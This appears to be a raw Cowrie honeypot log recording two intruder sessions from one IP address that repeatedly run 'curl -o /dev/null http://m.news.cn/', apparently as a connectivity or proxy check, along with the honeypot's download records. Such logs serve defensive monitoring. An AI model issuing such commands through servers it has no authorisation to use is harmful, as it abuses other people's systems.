{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.752281Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.753206Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.769964Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.770825Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.789549Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.790175Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.813752Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.814835Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.821557Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.831795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.832784Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.853118Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.856915Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.860948Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.862255Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.864253Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.888074Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.889256Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.909642Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.911717Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.915636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.917154Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.926748Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.949726Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.950775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.957108Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.961527Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.963178Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.966129Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.967562Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.977817Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.983042Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.989467Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.990411Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.995266Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.002901Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.003684Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.027991Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.029317Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.044127Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.045331Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.072260Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.073245Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.079447Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.080926Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.082109Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.083088Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.110934Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.112126Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.119877Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.120972Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.136267Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.150595Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.151475Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.161365Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.162352Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.191752Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.192760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.196345Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.198611Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.199459Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.228822Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.236222Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.237396Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.241895Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.242839Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.279693Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.280684Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.282841Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.283931Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.301705Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.302907Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.306398Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.321304Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.322479Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.325583Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.327312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.355271Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.357445Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.359384Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.360188Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.365605Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.366801Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.372783Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.380366Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.384222Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.395854Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.396864Z","src_ip":"212.227.125.160","session":"7541ed730449"}
